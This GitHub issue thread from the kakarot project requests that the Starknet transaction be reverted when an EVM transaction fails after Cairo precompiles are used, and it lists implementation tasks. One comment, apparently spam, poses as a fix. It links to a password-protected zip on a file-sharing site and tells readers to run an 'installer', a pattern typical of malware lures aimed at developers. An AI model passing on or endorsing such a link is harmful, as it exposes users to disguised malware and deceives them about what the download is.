### ISSUE TITLE
feat: revert the Cairo tx when evm tx fails and tx uses cairo precompiles

### ISSUE THREAD

**Issue by ClementWalter** [kkrt-labs/kakarot#1364]
### Describe the Feature Request

When the tx uses a Cairo precompiles, it can do Starknet state updates that are not managed by the `model.State`. Consequently, if eventually the EVM tx is `success=False`, we would need to revert these changes as well.

As a simple workaround, we can just revert the Starknet tx if the EVM tx is reverted and a cairo precompile has been used.

```[tasklist]
### Tasks
- [ ] add a cairo_precompile flag in model.EVM
- [ ] in the interpreter, after `State.finalize{state=state}()` , check if the evm is reverted if cairo_precompile is True. Raise cairo error in this case
- [ ] test by using a incremental amont of gas in a DualToken transfer
```

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ShantelPeters** [comment]
Hi @ClementWalter can I work on this ?
